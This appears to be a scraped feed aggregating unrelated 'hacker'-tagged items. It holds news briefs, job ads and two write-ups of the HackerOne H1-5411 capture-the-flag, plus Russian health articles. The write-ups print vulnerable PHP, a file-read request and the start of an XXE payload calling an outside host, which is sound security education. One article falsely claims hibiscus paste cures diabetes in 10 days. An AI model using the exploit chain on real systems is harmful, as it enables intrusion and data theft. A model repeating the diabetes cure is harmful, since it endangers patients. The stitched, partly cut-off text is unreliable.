The most capable workers – experts who can find vulnerabilities and detect advanced threats – can earn "above $200,000 to $250,000 a year" in the private sector, the GAO reports, citing a Rand study from 2014. That kind of salary, the agency adds, "greatly exceeds DOD's pay scale."

In a recent hearing on the U.S. military's cyber readiness held by the Senate Armed Services Committee, officials acknowledged intense competition for engineers.

"The department does face some cyberworkforce challenges," said Essye B. Miller, the acting principal deputy and Department of Defense chief information officer. She added, "DOD has seen over 4,000 civilian cyber-related personnel losses across our enterprise each year that we seek to replace due to normal job turnover."

Copyright 2018 NPR. To see more, visit http://www.npr.org/.

          Google's Home Hub is Missing a Camera. Here's Why That's a Smart Idea - TIME      Cache   Translate Page      

TIME

Google's Home Hub is Missing a Camera. Here's Why That's a Smart Idea
TIME
At Tuesday's Google event, the company unveiled the extensively leaked Pixel 3 and 3 XL smartphones, in addition to both a new ChromeOS tablet, the Pixel Slate, and a new smart home assistant in the form of Google Home Hub. While Google's made ...
Google takes on the iPad Pro and Surface Pro with the Pixel SlateMashable
The 5 Most Important Announcements from Google's Pixel EventLifehacker
Pixel 3 launch: Google unveils new smartphone and Home Hub smart screenTelegraph.co.uk
The Independent
all 3,171 news articles »

          An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider      Cache   Translate Page      

Business Insider

An alarming report shows hackers can break into US weapons systems in less than an hour
Business Insider
A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...
Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to actTechCrunch

all 307 news articles »

          Sony bắt đầu kiện người dùng bán máy PS4 bẻ khóa      Cache   Translate Page      

Cụ thể, một người đàn ông tại California đã chính thức bị Sony kiện vì đã bán các máy PS4 đã jailbreak trên mạng eBay. Playstation 4 đã có tuổi đời năm năm. Gần đây, hệ máy này nhiều lần bị các hacker bẻ khóa (jailbreak) trên nhiều firmware để có thể chơi game “lậu” […]

The post Sony bắt đầu kiện người dùng bán máy PS4 bẻ khóa appeared first on TRAINGHIEMSO.VN.


          US slow to protect itself from cyberattack - report      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
          The Complete Guide to Crowdsourced Security Testing      Cache   Translate Page      

The old way of doing security has failed, and more organizations are starting to trust crowdsourced ethical hackers to help with the growing demands of cybersecurity in a world that is technologically complex and increasingly threatened. As Crowdsourced Testing Solutions, including bug bounty programs, vulnerability discovery and hacker-powered penetration testing solutions have become viable options for a growing number of security leaders in recent years, defining the landscape and describing the differences and evolution of different offerings is overdue. 

We have based the analysis in this report on the data we have gathered through thousands of tests over the last few years; including hacker demographics, hacker activity, vulnerabilities found, vulnerabilities not found (but searched for), customer demographics, customer asset data and security of those assets over time.

 



Request Free!

          Comment on Watch How Fast A Tesla Model 3 Goes In Reverse by J. L. Brown      Cache   Translate Page      
A hacker could do this with a little reverse engineering? ;)
          Données exposées de 500 000 personnes sur Google+ : l’Europe veut que Google s’explique      Cache   Translate Page      
L’Europe a décidé de s’intéresser tout particulièrement à la fermeture de Google+ annoncée hier soir. Google a fait savoir qu’un problème au niveau de son API a permis à des hackers de récupérer les informations de 500 000 personnes, alors que cela n’aurait pas dû être possible. Problème …

Lire la suite

Aimez KultureGeek sur Facebook, et suivez-nous sur Twitter



          Tour Edge Exotics EXS Irons      Cache   Translate Page      

Fresh off the heels of the metal woods and hybrids being announced for the EXS…

The post Tour Edge Exotics EXS Irons appeared first on The Hackers Paradise.


          Senior Consultant, Red Team - Deloitte - Montréal, QC      Cache   Translate Page      
We’ve already performed hacking for our clients world-wide and in all industry sectors, and we’re now looking for hackers who are ready to respond to the most...
From Deloitte - Fri, 28 Sep 2018 07:36:20 GMT - View all Montréal, QC jobs
          Usuários relatam perda de arquivos e Microsoft deixa de recomendar atualização de outubro do Windows 10      Cache   Translate Page      

Quem teve problemas deve consultar o suporte técnico, mas quem já instalou e não teve problemas não precisa desinstalar o pacote. A Microsoft interrompeu a distribuição da October Update (atualização de outubro) do Windows 10 após usuários relatarem que arquivos estão sumindo do computador durante o processo de atualização. A causa do problema ainda está sob investigação, mas a Microsoft não vai mais distribuir o pacote pelo Windows Update e também recomenda que usuários aguardem e não utilizem qualquer mídia de instalação já preparada. Segundo relatos na web, o sumiço dos arquivos pode comprometer inclusive pastas padrão do Windows, como a "Documentos". Isso pode gerar perdas de arquivos importantes do usuário. Muitas pessoas instalaram a atualização sem nenhuma dificuldade ou consequência indesejada. O conjunto de fatores que faz o erro se manifestar é desconhecido, mas quem atualizou e não teve problemas não precisa desinstalar a atualização. Já quem instalou a atualização e teve problemas deve entrar em contato com o suporte técnico da Microsoft. As informações de contato com o suporte técnico podem ser obtidas nesta página. Como existe uma possibilidade de recuperar o que foi perdido, recomenda-se evitar o uso do dispositivo afetado para diminuir a chance de os arquivos serem substituídos com outros dados. Problema foi relatado e ignorado Em 2014, publicações como a "ZDNet" e a "Bloomberg" observaram que a Microsoft planejava diminuir o número de engenheiros de teste com dedicação exclusiva. Em vez disso, a função seria desempenhada por gerentes de projeto ou pelos próprios desenvolvedores, com outros testes ficando a cargo dos "Insiders", que são voluntários. A própria gestão do programa Insider, porém, vem sendo criticada. Diversos usuários das versões de testes do Windows Insider relataram que arquivos estavam sumindo usando a ferramenta de "Hub de Comentários" da Microsoft. No entanto, os avisos aparentemente não foram suficientes. O Windows enfrentou problemas significativos em várias atualizações. Em 2016, por exemplo, a atualização fez diversas webcams pararem de funcionar. Em janeiro, uma atualização de segurança também foi suspensa por deixar computadores com peças da AMD inoperantes. A Microsoft culpou o problema em um "erro na documentação" da própria AMD. Dúvidas sobre segurança, hackers e vírus? Envie para g1seguranca@globomail.com
          Growth Hacker - KLF Group - Montréal, QC      Cache   Translate Page      
Experience with growth hackings tools. We’re looking for a Growth Hacker to help find creative ways to over-deliver on our ambitious client acquisition targets....
From Indeed - Tue, 25 Sep 2018 21:31:43 GMT - View all Montréal, QC jobs
          H1-5411 CTF Write-up by erbbysam and ziot      Cache   Translate Page      

H1-5411 CTF Write-up by erbbysam and ziot

Authors: Sam Erb Brett Buerhaus

erbbysam and I recently set out to beat the latest CTF challenge hosted by HackerOne. Here is a write-up with the process we took from start to finish.

The h1-5411 CTF begins with a tweet from HackerOne:

We bring the memes! First 10 winners get a ticket to hack with us at h1-5411 on Saturday for up to $150K in bounties! #h15411 #memeCTF #eko14 #togetherwehitharder pic.twitter.com/hDvnehMxou

― HackerOne (@Hacker0x01) September 26, 2018

This leads you to the CTF website:

https://h1-5411.h1ctf.com/

The website allows you to select a meme template, top text, and bottom text. This generates a meme saved to your session that is either an image or txt file.


H1-5411 CTF Write-up by erbbysam and ziot
Generating a Meme

The POST request looks like the following:

POST /api/generate.php HTTP/1.1
Host: h1-5411.h1ctf.com
User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://h1-5411.h1ctf.com/generate.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 63
Cookie: PHPSESSID=qpvh9cil4heghbjdq6cp4vfbgs
Connection: close
template=template4.txt&type=text-text=test⊥-text=test

The template parameter sets a filename to use as part of the meme generation process.


H1-5411 CTF Write-up by erbbysam and ziot

As you may guess, the template variable is vulnerable to Local-File Read (LFR). As long as you set it to a txt template, you can specify any arbitrary file on the system and fetch its’ file contents. Here’s an example of fetching PHP source code:


H1-5411 CTF Write-up by erbbysam and ziot

Here you can see the source code when viewing your saved memes:


H1-5411 CTF Write-up by erbbysam and ziot

After enumerating from index.php to all the files inside of each file include(), we eventually have the source code for the entire application. The next step is to figure out what other vulnerabilities exist in the app.

In the /includes/classes.php file the first thing that stands out is that they are intentionally disabling XXE protection.


H1-5411 CTF Write-up by erbbysam and ziot

That means the DOMDocument->loadXML() is vulnerable to external entities/DTDs and would allow us to execute malicious XXE payloads. The question from here is, how do we set ConfigFile class’s config_raw variable.

From the /includes/header.php file, there are two interesting files that you cannot discover without the LFR vulnerability.

/import_memes_2.0.php /export_memes_2.0.php

Each one sends a POST request to files of the same name in the /api/ directory.

/api/import_memes_2.0.php <?php
require_once("../includes/config.php");
if (isset($_FILES['f'])) {
$new_memes = unserialize(base64_decode(
file_get_contents($_FILES['f']['tmp_name'])));
$_SESSION['memes'] = array_merge($_SESSION['memes'], $new_memes);
}
header("Location: /memes.php");
?> /api/export_memes_2.0.php <?php
require_once("../includes/config.php");
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.time().'_export.memepak"');
echo base64_encode(serialize($_SESSION['memes']));
?> With the import API script, we are able to specify input into unserialize() with file upload POST requests. The uploaded unserialized data gets merged into $_SESSION[“memes”] where all of your memes are saved.

Now that we knew we could create PHP objects via unserialize (object injection) and knowing that there is an XXE in the ConfigFile class, we had to figure out how to put it all together.

The ConfigClass has a magic method function __toString() that will get called any time the class is initialized and treated as a string. That usually means whenever the variable that has the class assigned to is echo, print, print_r, etc.

function __toString() {
$this->parse();
$debug = "";
$debug .= "Debug Info :\n";
$debug .= "TopText => {$this->top_text}\n";
$debug .= "BottomText => {$this->bottom_text}\n";
$debug .= "Template Location => {$this->template}\n";
$debug .= "Template Type => {$this->type}\n";
return $debug;
}

We’ll talk about how that gets triggered after further explaining the attack. Following the __toString() execution chain, we see that it immediately calls the parse() function.

function parse() {
$dom = new DOMDocument();
$dom->loadXML($this->config_raw, LIBXML_NOENT | LIBXML_DTDLOAD);
$o = simplexml_import_dom($dom);
$this->top_text = $o->toptext;
$this->bottom_text = $o->bottomtext;
$this->template = $o->template;
$this->type = $o->type;
}

This is promising because $this->config_raw gets passed into the vulnerable loadXML() function call and does not get overwritten with anything static. That means if we create an object that gets unserialized, we can specify the config_raw variable and it will execute our XXE payload.

We setup a test script by ripping out all the code involved in this attack chain in order to test it locally with warnings enabled. Their server is not displaying any PHP errors or warnings meaning we’re completely blind to any potential roadblocks that we run into.

Here is a gist of the test code we were playing with:

https://gist.githubusercontent.com/ziot/e72c8c45865ea86d9c6aa6975615e839/raw/d0fb09a5a99be0c815c3e854e5b9900f2384b5dd/gistfile1.txt

Using the script above, we ran base64_encode(serialize()) functions on top of the newly created class after specifying our XXE payload inside of config_raw.

Example:

class ConfigFile {
...
}
$test = new ConfigFile("asdf");
$test->config_raw = '<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "https://xs
          Capturing the HackerOne Flag      Cache   Translate Page      

by Daniel Abeles & Shay Shavit

HackerOne is a bug bounty platform that allows hackers around the world to participate in bug bounty campaigns, initiated by HackerOne's customers. Recently, HackerOne announced they would be hosting a special live hacking event in Buenos Aires along side a week long security conference, Ekoparty 14 .

In order to participate the special event, you either have to be a top ranked hacker on their platform, or solve a challenge. Although we don't intend to fly from Israel to Argentina, challenges, especially capture the flag (CTF) challenges, really excited us.

We heard about the CTF from HackerOne's tweet, and immediately set our sights on the prize. The CTF started from the tweet itself, which contained an image with a QR code:


Capturing the HackerOne Flag

The QR code represented the following string:


Capturing the HackerOne Flag

The characters looked familiar, and we immediately suspected they were URL encoded bytes, so we added a '%' to every second character:

%68%74%74%70%73%3a%2f%2f%68%31%2d%35%34%31%31%2e%68%31%63%74%66%2e%63%6f%6d

We decoded the string using Burp Suite's decoder to reveal the URL ( https://h1-5411.h1ctf.com ):

From there, we started exploring the website:


Capturing the HackerOne Flag

The website was a meme generation service. In order to test its capability, we picked a template from a closed set of images and created our own meme. The capability was presented at the following page:


Capturing the HackerOne Flag
The page allows users to choose between text and image types of memes; after inserting the top and bottom text,we hit the GENERATE button, and the image/text was shown at the bottom.
Capturing the HackerOne Flag

Once a meme is generated, it was added to a list of memes stored in the session. All the memes, are reflected at the "memes.php" page.

We took a closer look at the generation request and noticed that the response contained JSON string with the local meme path on the remote server (we couldn't control the "meme_path" value, since it was auto-generated by the server).


Capturing the HackerOne Flag
Capturing the HackerOne Flag

We tried to manipulate some fields with no success. We thought the "template" field might be vulnerable to Local File Inclusion since its URL indicated it was a file. Instead of supplying a template, we tried to pull the "/etc/passwd" file. Success!


Capturing the HackerOne Flag
Capturing the HackerOne Flag

After we validated the vulnerability, we had the ability to reflect local files from the server to the memes page. Using this vulnerability, our next step was to pull the website's source code. We started by pulling the "index.php" file:


Capturing the HackerOne Flag
Capturing the HackerOne Flag

Once we have succeeded in pulling the "index.php" we iteratively pulled every php file referenced in the source code, resulting in an almost full dump of the of the site. Some code was not pulled with this method, since it was not referenced in other pages:


Capturing the HackerOne Flag

We examined the source code, and the "headers.php" file caught our attention. It had 2 lines commented out - the import and export memes php files -- which looked like they belonged to the 2.0 version of the site:


Capturing the HackerOne Flag

These pages were still available on the website:


Capturing the HackerOne Flag
Capturing the HackerOne Flag

We inspected the "export" functionality. A brief examination of the export function showed the ability to download your entire meme collection in a "memepak" format. We opened the file, which contained base64 encoded data from a PHP serialized array:


Capturing the HackerOne Flag
This immediately gave us a hint that we might be facing a deserialization vulnerability. One method of exchanging data between a client and server is object serialization. When the client requests a programmatic resource, the server can turn that resource into a string (serialization) and hand it over to the client. The process works also works in the opposite direction, creating an object from a string is called "deserialization".

In PHP, in order to unserialize an object, the PHP interpreter must be familiar with the class information - this meant we can only serialize primitives (like integers) or defined classes (arrays, custom classes).

Besides being familiar with the classes, needed to meet a two objectives to complete a successful deserialization attack:

Have some sort of control on data that was input to the class

A sink function (magic function) that could reference the input data and be triggered natively by the system (like "__toString", "__constuct", etc).

On the "classes.php" file we extracted before, we found 3 defined classes:

Template

Maintenance

ConfigFile

The Maintenance class was commented out, with a comment stating it belonged to an internal service, which made it a dead end.

The ConfigFile was the most interesting class, since it contains the "__toString" magic function. "_toString" executed the parse function, loading an external XML file which could lead to an XML External Entity processing vulnerability (XXE).

In the process of parsing the XML, the parser goes through the input and reaches an external entity. It then tries to retrieve the content of the entity. This can expose the application to various risks, such as information disclosure, server side request forgery, inner network port scanning amongst other vulnerabilities.


Capturing the HackerOne Flag

Since the "ConfigFile" class seemed like a good entry point, we chose it as our desired class to serialize. To exploit the deserialization vulnerability, we were required finding where the serialization method was invoked. The code showed the content was serialized is the memes array stored in the session:


Capturing the HackerOne Flag
The deserialization phase occurs on the import function, when uploading a new "memepak" file. The function first validated the we had uploaded a file, then read its content, base64 decoded it, and sent it to the
          Illinois braces for another Russian attack on its election systems      Cache   Translate Page      
The frontline in the war between foreign hackers and U.S. election officials is an office in a Springfield, Illinois strip mall.
           Pszichiátriai vizsgálatra küldik a csehek által Amerikának kiadott orosz hackert       Cache   Translate Page      
Pszichiátriai kivizsgálásra utalta be egy amerikai bíróság a hackertevékenységgel vádolt Jevgenyij Nyikulin orosz állampolgárt, akit Prága adott ki tavasszal az Egyesült Államoknak.
          [OGR-28] hitparade van week 41      Cache   Translate Page      
Replies: 4 Last poster: KuuKe at 10-10-2018 05:53 Topic is Open [OGR-28] hitparade van 9 oktober 2018Daily Top 30posdailymembertotal1.()196.686RamonP35.867.024(7)2.()129.259Theadalus70.899.104(5)3.()74.698Division Brabant425.197.004(1)4.()61.036ra.v.ochten at gmail.com4.242.103(21)5.()39.707Distri Server13.581.507(17)6.()28.191 ossy_66634.101.995(10)7.()6.084Crazy Cow Squad190.869.091(3)8.(2)2.379reznor15.392.143(15)9.()2.363Team_Kwakende_kip103.881.585(4) Meer...Overall Top 30postotalmemberdaily1.()425.197.004Division Brabant74.698(3)2.()220.878.417Andy4fun03.()190.869.091Crazy Cow Squad6.084(7)4.()103.881.585Team_Kwakende_kip2.363(9)5.()70.899.104Theadalus129.259(2)6.()39.086.637NightBird07.()35.867.024RamonP196.686(1)8.()35.091.971Team KillEmAll graast voor goud09.()34.625.943Uplinksweetlake010.()34.101.995 ossy_66628.191(6)11.()28.100.576St4ck3r012.()27.832.833Grutte Pier [Wa Oars]013.()18.161.751x-RaY99 the one-man 'team'014.()15.738.922Damic015.()15.392.143reznor2.379(8)16.()14.320.802Qazwaplol017.()13.581.507Distri Server39.707(5)18.()7.057.749The_Greater019.()5.844.881EliteHackers.info020.()5.442.031somerjer at blerry.nl021.()4.242.103ra.v.ochten at gmail.com61.036(4)22.()3.315.295RhinoTech023.()2.550.942IceStorm024.()1.756.562[eNeRGy]025.()1.558.622DigiK-oz026.()1.400.875Antoine027.()1.252.542Robinski028.()1.044.032Tinkerer029.()1.037.366Jan-Lieuwe Koopmans030.()635.678VictordeHollander0 Meer...Teams Daily Top 15posdailymembertotal1.(1)4.169.217yoyo@home BOINC wrapper6.773.993.200(1)2.(1)2.703.254SEGA Users Group2.171.236.128(3)3.(1)2.068.309AnandTech 106351.994.243.120(5)4.(3)581.967Team Hampshire College403.621.946(18)5.(4)571.652BOFH@Chalmers1.656.365.624(7)6.()540.402Dutch Power Cows1.365.870.201(9)7.(9)491.381Team-Goobee.org508.702.033(17)8.(4)407.712Team Warped (OS/2)660.716.495(15)9.(1)397.557BugTraq.Ru Team. United power of xUSSR.2.121.174.162(4)10.(2)395.793Czech D.NET Team1.086.862.909(10)11.(2)365.615Distributed Amiga861.101.477(13)12.(1)364.558Lost Clusters - Denmark269.946.502(21)13.()265.750Team MorphOS650.260.332(16)14.(70)258.663ParadoxZ Commando21.636.352(120)15.(1)194.972Linuxfr: French Linux Team1.416.946.533(8) Meer...Teams Overall Top 15postotalteamdaily1.()6.773.993.200yoyo@home BOINC wrapper4.169.217(1)2.()3.535.803.327linux-de.org03.()2.171.236.128SEGA Users Group2.703.254(2)4.()2.121.174.162BugTraq.Ru Team. United power of xUSSR.397.557(9)5.()1.994.243.120AnandTech 106352.068.309(3)6.()1.879.057.673Free-DC111.320(17)7.()1.656.365.624BOFH@Chalmers571.652(5)8.()1.416.946.533Linuxfr: French Linux Team194.972(15)9.()1.365.870.201Dutch Power Cows540.402(6)10.()1.086.862.909Czech D.NET Team395.793(10)11.()1.031.811.101Ukraine48.338(38)12.()872.397.176San Antonio Linux User Group013.()861.101.477Distributed Amiga365.615(11)14.()669.096.666HardOCP13.507(83)15.()660.716.495Team Warped (OS/2)407.712(8) Meer...LedenFlushers: 9/63 = 14.3%Geen nieuwe leden InhaalstatsTeam Hampshire College haalt ons in over6 jaarCzech D.NET Team haalt ons in over24 jaarLinuxfr: French Linux Team wordt ingehaald over6 maandenFree-DC wordt ingehaald over3 jaarlinux-de.org wordt ingehaald over11 jaarBugTraq.Ru Team. United power of xUSSR. wordt ingehaald over15 jaarMegaflush top 57 juli 2018Theadalus40.049.0071 december 2015Division Brabant30.471.11925 december 2017Crazy Cow Squad12.354.29416 augustus 2015Andy4fun6.814.46914 april 2014Qazwaplol6.251.321Meer informatieOGR-28 projectpagina op WDO*** suggesties voor een DPCH? ***bron
          11 способов избавления от лишнего веса без упражнений      Cache   Translate Page      

Каждый хотел бы найти способ похудеть без физических упражнений. В то время как физические упражнения и изменение диеты – лучшие способы похудения, можно сбросить килограммы, не прилагая особых усилий, чтобы изменить свой образ жизни. Совмещайте эти легкие изменения к вашим привычкам, чтобы потерять вес более эффективно. Если вы добавите упражнения, вы увидите еще большие результаты.

11 способов избавления от лишнего веса без упражнений:

1. Изменение времени приема пищи
Когда вы пытаетесь похудеть, то отличной идеей будет прекратить есть за 3 часа до сна. Например, если вы ложитесь спать в 11: 00, прекратите есть в 8: 00. Ваше пищеварение будет более эффективным, и у вас не будет лишних калорий, сидящих в желудке, когда вы ложитесь спать.

2. Используйте меньшие порции
Наши размеры порций взлетели до небес, так как наши тарелки стали больше. Разумно будет сократить размеры порций. Сначала мы едим глазами. Вы будете чувствовать себя более удовлетворенными этими меньшими порциями, если будете есть с меньшей тарелки.

3. Откажитесь от фаст-фуда и еды вынос полностью
Не ешьте ничего из ресторана быстрого питания. Это одно из самых простых изменений в вашем образе жизни без необходимости делать упражнения для похудения. Рафинированный сахар, белый хлеб, жирное мясо и нездоровые начинки сорвут ваш рацион.

4. Замедлитесь
Когда вы едите, замедлитесь и тщательно пережевывайте пищу. Когда люди быстро едят, более вероятно, что они наберут вес. Когда вы едите слишком быстро, ваш мозг не имеет времени, чтобы отправить сигнал, что вы сыты.

5. Цельные зерна и клетчатка
Замените весь свой белый хлеб и макароны цельными зернами. Эти продукты ниже по гликемическому индексу, что означает, что они не поднимут уровень сахара в крови столько, сколько их рафинированные кузены. Они также содержат добавленное волокно.

6. Протеин
Согласно изучению 2005 от американского журнала клинического питания, рацион с протеином 30% помог сжигать 441 калорию в день. После 12 недель, они увидели среднюю потерю веса на 5 килограмм без тренировки.

7. Устраните нездоровую пищу из рациона
Лучше не держать в доме нездоровую пищу, но если она все же есть, держите ее подальше. Если вы не видите ее постоянно, когда вы находитесь на кухне, вы будете иметь гораздо меньше шансов побаловать себя. Держите здоровые закуски, такие как фрукты и овощи на виду.

8. Оставайтесь хорошо увлажненными
Исследование 2010 года в журнале «Ожирение» обнаружило, что при употреблении воды перед едой, снижается количество еды, которую люди ели в каждый прием пищи. Вода помогает вашему желудку чувствовать себя сытым. Стоит пить ее для собственного блага, но это особенно полезно для потери веса.

9. Не смотрите телевизор, пока едите
Если во время еды регулярно включаются электронные устройства, такие как телевизор или компьютер, попробуйте выключить их. Согласно исследованию, опубликованному в Американском журнале в 2013 году, люди, которые отвлекаются на электронику, едят на 10% больше, чем люди, которые держат устройства выключенными.

10. Откажитесь от всех напитков с сахаром
Один из самых простых способов сбросить килограммы без физических упражнений – перестать употреблять напитки с сахаром. Сок, подслащенные напитки, такие как кофе и чай, а также газированные напитки являются высококалорийными виновниками. Вместо этого, пейте несладкие напитки, такие как зеленый чай, кофе и вода.

11. Ешьте 4 раза в день
Не ограничивайте ваши калории так много, чтобы у вас было чувства голода в течение дня. Ешьте здоровую пищу между приемами пищи. Овощи, крекеры из цельного зерна и белок – отличный выбор. Вы должны стремиться к питанию 4 раза в день.

Источник
Перевод и адаптация — Фитхакер
Фото — g2.delphi.lv

Загрузка...

Let's block ads! (Why?)


          7 ранних предупреждающих признаков рака в организме, которые не следует игнорировать      Cache   Translate Page      

В случае рака происходит неконтролируемый рост клеток в организме, который появляется, когда нормальный сдерживающий механизм не работает, как ожидалось, что может привести к образованию новых и аномальных клеток без переработки старых.

Непрерывное образование новых клеток перекрывает старые клетки, образуя огромную массу ткани, которая называется опухолью. Как правило, это не мгновенный процесс, который не занимает много времени. Пока это происходит внутри вашего тела, оно попытается сказать вам что что-то идет неправильно с помощью различных предупреждений. Таким образом, чтобы помочь вам, мы перечислили 7 предупреждающих признаков рака, которые вы не должны игнорировать, и если вы страдаете от любого из перечисленных ниже признаков, то настоятельно рекомендуется провериться у вашего врача.

7 ранних предупреждающих признаков рака в организме, которые не следует игнорировать:

1. Образование шишек на вашем теле:
Часто происходит случайное образование комков в вашем теле в разных местах, многие из них исчезают со временем, но некоторые остаются, независимо от того, что вы делаете, чтобы лечить их. Эти шишки могли быть одним из передовых предупредительных знаков что раковая клетка формируется в массах ткани. Если вы имеете любую странную шишку на вашем теле, то вы должны пойти прямо к вашему доктору, чтобы он проверил все как можно скорее.

2. Кашель или сухость в горле:
Кашель довольно распространен из-за простуды и гриппа, являющимся самым частым заболеванием. Однако, в среднем, симптомы простуды и гриппа полностью исчезнут в течение недели. Но, если вы сталкиваетесь с проблемой постоянного кашля и сухости в горле, то это может быть симптомом рака горла, щитовидной железы или лимфомы. Таким образом, в такой ситуации вы должны пойти к врачу, не теряя времени.

3. Постоянная лихорадка или инфекции:
Если вы довольно часто страдаете от лихорадки и других инфекций, это может быть признаком лейкемии или рака крови. Рак крови является одним из самых опасных видов рака и не поддается лечению, если не обнаружен на более ранней стадии.

4. Усталость:
Это может быть одним из самых общих симптомов любого типа рака и обычно происходит довольно часто. Если вы часто чувствуете слабость и усталость, даже после здорового питания, то вы должны пойти и обратиться к врачу для дальнейших тестов. Эти симптомы наблюдаются в сочетании с другими симптомами, чтобы определить тип рака.

5. Помехи при глотании пищи:
Если во время еды или питья вы чувствуете себя очень неудобно и не можете правильно проглотить пищу, то это один из симптомов, связанных с раком горла. Образование раковых клеток в горле делает его перегруженным, что вызывает проблемы при употреблении пищи или воды. Часто эта трудность вызвана другими факторами и исчезает автоматически. Но если это не так, то обратитесь к врачу.

6. Изменение в режиме кишечника:
Движения кишечника могут быть изменены по многим причинам в зависимости от типа и количества пищи, которую вы едите, и лекарств, которые вы используете. Многие люди часто испытывают изменение, количество и размер их кишечников и не обращают внимания на эти небольшие симптомы. Но они не совсем незначительны и могут быть признаком рака толстой кишки.

7. Кровь в моче:
Многие люди страдают ИМП или инфекциями мочевыводящих путей, которые чаще всего встречаются у женщин. Однако, мужчины также могут столкнуться с этой проблемой. Если кто-то испытывает ИМП, они могут увидеть, что цвет их мочи красный и часто чувствуют боль при мочеиспускании. ИМП полностью излечим. Но даже после приема всех правильных лекарств кровь в моче все еще появляется, у вас может быть шанс развития рака простаты, пузыря или почки.

Источник
Перевод и адаптация — Фитхакер
Фото — healthline.com

Загрузка...

Let's block ads! (Why?)


          Как вылечить диабет естественным способом в домашних условиях всего за 10 дней      Cache   Translate Page      

Диабет возникает, когда орган, ответственный за выработку инсулина, начинает создавать меньшее или большее количество инсулина, чем требуется организму. Этими болезнями нужно управлять должным образом, и это единственный способ жить лучшей и здоровой жизнью.

Причины диабета:
Существует несколько причин развития диабета. Некоторые из них перечислены ниже:

1. Семейная история диабета:
Да, есть вероятность, что вы заболеете диабетом, так как ваши родственники и члены семьи тоже болеют диабетом.

2. Заболевания поджелудочной железы:
Заболевания поджелудочной железы могут вызвать задержку выработки инсулина. Отсюда и диабет.

Распространенными симптомами диабета являются:
— ваша кожа зудит и появляется сухость во рту;

— иногда при недостатке жидкости в организме наблюдается также недостаток влаги в глазах, при этом состоянии глазные линзы начинают набухать и теряют способность фокусироваться на объектах и зрение становится размытым;

— мочеиспускание также приносит продукцию кетонов к существованию. Кетоны найдены опасными по мере того, как они причиняют опасные для жизни состояния, когда кетоны произведены в теле они могут заставить вас чувствовать себя больными и вы можете испытывать чувство тошниты.

Поэтому, зная общие симптомы, которые приходят с диабетом, давайте двигаться вперед к лекарству, которое может помочь вам убить диабет навсегда за 10 дней.

Листья гибискуса: средство от диабета:

Ингредиенты:
листья гибискуса
чистая и питьевая вода

Простые шаги приготовления:
Возьмите листья гибискуса и очистите их водой.
Возьмите питьевую воду и положите в нее листья гибискуса.
Используйте кофемолку, чтобы измельчить листья и смешать их в воде.

Соберите пасту и сохраните ее.

Теперь можно добавить 4 столовые ложки пасты, созданной путем измельчения листьев гибискуса, в половину стакана питьевой воды и перемешать.

Оставьте эту смесь на ночь.

Утром употребляйте ее натощак.

Повторите этот процесс вечером.

Важный момент:
Не пропустите ни одного раза приема этого средства.

Строго следуйте лечению на протяжении 10 дней.

Это средство работает только при строгом соблюдении расписания.

Источник
Перевод и адаптация — Фитхакер
Фото — dekorativnye.ru

Загрузка...

Let's block ads! (Why?)


          Как проверить, является ли мед чистым или поддельным. Используйте этот простой трюк!      Cache   Translate Page      

Мед считается древним средством, которое используется для нескольких процедур, связанных со здоровьем и красотой. Мед – кладезь различных питательных веществ и минералов, которые очень полезны для вашего здоровья и благополучия, а также долгой и здоровой жизни.

Мед содержит антибактериальные и антисептические свойства, которые полезны для лечения многих проблем красоты. Он работает как естественное очищающее средство и обеспечивает вам здоровый тон кожи. Но найти оригинальный и чистый мед не так просто. Поддельный мед часто встречается на рынке и выглядит вполне реальным, но не имеет никаких результатов.

Мед полезен для здоровья. Он содержит витамины, железо и другие минералы. Мед богат большим количеством минералов, полезных для пищеварения и для тела в целом. Но нам нужен чистый мед, и здесь мы расскажем, как отличить настоящий мед от поддельного.

Мы должны проверить:

1. Твердая стадия меда:
Это один из самых простых способов, который определяет чистоту меда. Посмотрите на дно, если вы видите кристаллическую форму внизу, убедитесь, что ваш мед чист. Для более удобных и быстрых результатов вы можете положить мед в холодильник, если он все еще остается в жидком виде, то убедитесь, что он поддельный, и вы не должны использовать его.

2. Прочитайте этикетку правильно:
Каждый раз, когда вы покупаете мед, внимательно читайте этикетку и ингредиенты. Убедитесь, что список ингредиентов меда не содержит кукурузный сироп с высоким содержанием фруктозы или глюкозы. Эти 2 вещества обычно добавлены к еду для того, чтобы он не густел.

3. Испытание большого пальца руки:
Капните мед на большой палец. Если вы чувствуете разливы, это не настоящий мед, если он остался на большом пальце, это чистый мед. Всегда помните, что чистый и оригинальный мед немного гуще. С другой стороны, поддельный мед выглядит жидковатым.

4. Испытание водой:
Возьмите стакан воды, добавьте в него одну столовую ложку меда. Если мед не чист, он растворится в воде.

5. Испытание пламенем:
Все должны знать, что органический мед огнеопасен. Возьмите сухую спичку, окуните ее в мед и поднесите к спичечной коробке. Она будет гореть, если мед чистый. В случае, если он нечист, пламя не будет гореть, оно не будет гореть, так как нечистый мед содержит влагу.

6. Тест на промокательной бумаге:
Положите немного меда на промокательную бумагу, если он нечистый, он будет поглощен промокательной бумагой. Чистый мед не впитывается.

Никакой мед нельзя разбавлять сахарным сиропом.
Мед – это пересыщенный сахарный раствор. Мед содержит 18% воды, которой недостаточно для замораживания.

У меда есть энергия, есть калории. Тот, кто хочет похудеть, должны добавлять мед в воду или в молоко. В меде нет жира. Он хранится в жидком виде, не нагревается и не фильтруется. Вы можете найти мед в различных формах на рынке.

Сырой, натуральный мед кристаллизуется. Это из-за кристаллов глюкозы. Таким образом, он является чистым.

Источник
Перевод и адаптация — Фитхакер
Фото — images.aif.ru

Загрузка...

Let's block ads! (Why?)


          10 удивительных преимуществ и способов применения миндаля      Cache   Translate Page      

Каждый любит есть орехи, потому что они вкусные и имеют много пользы для здоровья.

